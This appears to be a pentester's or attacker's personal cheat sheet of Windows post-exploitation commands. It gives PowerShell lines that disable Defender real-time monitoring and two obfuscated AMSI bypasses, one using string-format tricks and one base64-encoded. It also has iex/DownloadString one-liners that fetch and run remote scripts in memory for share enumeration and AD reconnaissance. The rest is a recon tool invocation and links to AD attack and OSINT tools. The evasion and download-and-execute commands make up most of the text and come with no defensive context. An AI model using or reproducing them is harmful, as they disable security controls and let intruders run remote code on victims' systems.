Disabled Real time monitoring
Set-MpPreference -DisableRealtimeMonitoring $true

Disabled Antivirus
sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Base64 Command for Bypass Antivirus
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

Open Network share enumeration

Invoke-HuntSMBShares -Threads 100 -RunSpaceTimeOut 10 -OutputDirectory D:\test
 iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1') -Verbose

Execute in Memory
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/sagar0121/ADRecon/master/ADRecon.ps1') -Verbose
Recon tool for complete target

https://github.com/six2dez/reconftw
./reconftw.sh -d target.com -r



https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview


Amazing for AD recon and attack
https://github.com/S3cur3Th1sSh1t/WinPwn


Email to org
https://phonebook.cz


Github recon
https://shahjerry33.medium.com/github-recon-its-really-deep-6553d6dfbb1f


Content Scan in files
https://github.com/gh0x0st/SMB-Data-Discovery/blob/master/Invoke-ContentScan.ps1
